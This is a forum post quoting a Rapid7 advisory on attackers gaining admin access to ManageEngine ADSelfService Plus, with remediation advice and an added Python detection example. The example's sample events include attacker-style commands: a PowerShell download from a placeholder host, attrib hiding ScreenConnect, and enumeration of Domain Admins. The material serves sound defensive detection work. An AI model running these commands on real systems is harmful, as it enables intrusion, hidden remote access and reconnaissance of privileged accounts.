Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances


FYI, anyone with internet-facing self-service should act quickly.

Rapid7 reporting

Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances

Rapid7 Managed Detection and Response (MDR) recently observed several incidents in which remote attackers have compromised internet-facing systems running ManageEngine ADSelfService Plus in managed customer environments. The attackers used valid ADSelfService Plus admin credentials to gain system-level access.

Our team is working with the vendor to investigate potential root causes and determine remediations. We are notifying our customers out of an abundance of caution so that they may take steps to assess and mitigate risk to their organizations.

Recommendations:
If your organization uses ManageEngine ADSelfService Plus, we strongly recommend:

  • Changing the “admin” user’s password and enabling multi-factor authentication (MFA) for this account
  • Taking the affected systems offline entirely if suspicious activity is observed

What can Rapid7 InsightVM users do to determine their exposure?
InsightVM customers can use Query Builder to find assets running ADSelfService Plus with the following query: `software.product` `ends with` `ADSelfService Plus`.

Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for `Software name` `contains` `ADSelfService Plus`.

Does InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this attack. We recommend that you review your settings for these detection rules and confirm they are turned on and set to an appropriate rule action and priority for your organization:

  • Suspicious Process - Powershell Invoke-WebRequest
  • Attacker Technique - Attrib Sets File Or Directory As Hidden And System
  • Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command
  • Suspicious Process - Zoho ManageEngine Spawns Child

We have also added the following detection rule and prioritized it as Critical:

  • Attacker Technique - Hiding ScreenConnect With Attrib

Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary.

For up-to-date information on this threat, please refer to this article.
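The rule names in the quoted advisory all describe process-creation behaviour: a ManageEngine process spawning a shell, PowerShell pulling content with Invoke-WebRequest, attrib.exe marking a ScreenConnect directory hidden and system, and net.exe enumerating the Domain or Enterprise Admins groups. The Python below is an added example of how a defender could express those checks over process-creation telemetry; it is not Rapid7's rule code and not part of the original post. The event shape, the ManageEngine install path, the list of child processes treated as suspicious, and every sample command line are constructed assumptions.

```python
"""Toy detection logic for the process-creation behaviours named in the
advisory. Added example, not Rapid7's or Zoho's code; the event fields and
all sample data below are constructed."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set


@dataclass
class ProcessEvent:
    """Minimal process-creation record (think Sysmon event ID 1 or an EDR feed)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Assumption: a Java-based web app has no business spawning these directly.
SUSPICIOUS_CHILDREN: Set[str] = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe",
    "attrib.exe", "certutil.exe", "wscript.exe", "cscript.exe",
}
NET_ADMIN_ENUM = re.compile(r"\bgroup\b.*\b(domain|enterprise) admins\b", re.I)
INVOKE_WEBREQUEST = re.compile(r"\b(invoke-webrequest|iwr)\b", re.I)  # iwr is the built-in alias


def _attrib_flags(ev: ProcessEvent) -> Set[str]:
    """Return the +x / -x switches passed to attrib.exe, empty for any other image."""
    if _basename(ev.image) != "attrib.exe":
        return set()
    return {t.lower() for t in ev.command_line.split() if t.startswith(("+", "-"))}


def rule_manageengine_spawns_child(ev: ProcessEvent) -> bool:
    # Assumption: the parent path contains the product directory name.
    return "manageengine" in ev.parent_image.lower() and _basename(ev.image) in SUSPICIOUS_CHILDREN


def rule_powershell_invoke_webrequest(ev: ProcessEvent) -> bool:
    return _basename(ev.image) in {"powershell.exe", "pwsh.exe"} and bool(
        INVOKE_WEBREQUEST.search(ev.command_line))


def rule_attrib_hidden_system(ev: ProcessEvent) -> bool:
    flags = _attrib_flags(ev)
    return "+h" in flags and "+s" in flags  # order of switches does not matter


def rule_hiding_screenconnect_with_attrib(ev: ProcessEvent) -> bool:
    return "+h" in _attrib_flags(ev) and "screenconnect" in ev.command_line.lower()


def rule_net_enum_admins(ev: ProcessEvent) -> bool:
    return _basename(ev.image) in {"net.exe", "net1.exe"} and bool(
        NET_ADMIN_ENUM.search(ev.command_line))


RULES: Dict[str, Callable[[ProcessEvent], bool]] = {
    "manageengine_spawns_child": rule_manageengine_spawns_child,
    "powershell_invoke_webrequest": rule_powershell_invoke_webrequest,
    "attrib_hidden_system": rule_attrib_hidden_system,
    "hiding_screenconnect_with_attrib": rule_hiding_screenconnect_with_attrib,
    "net_enum_admins": rule_net_enum_admins,
}


def evaluate(ev: ProcessEvent) -> List[str]:
    """Names of every rule that fires on one event (empty list for benign)."""
    return [name for name, fn in RULES.items() if fn(ev)]


def scan(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> matched rules, omitting events with no hits."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


# Constructed sample telemetry: four events modelled on the advisory's rule
# names plus one benign event. Paths and URLs are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -Command "Invoke-WebRequest http://example.invalid/u.zip -OutFile C:\\Temp\\u.zip"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\attrib.exe",
                 r'attrib +s +h "C:\Program Files (x86)\ScreenConnect Client (placeholder)"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
                 'net group "Domain Admins" /domain'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", hits)
```

Each rule is a pure function over one event, so a new behaviour is one more entry in `RULES`; the attrib checks share one tokeniser so that switch order (`+s +h` versus `+h +s`) cannot dodge the rule, and the net.exe check matches on the `group` verb plus the group name rather than an exact string, which is the usual way to survive quoting and spacing variations.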


Does anyone know how to configure the admin account for MFA like indicated in the article?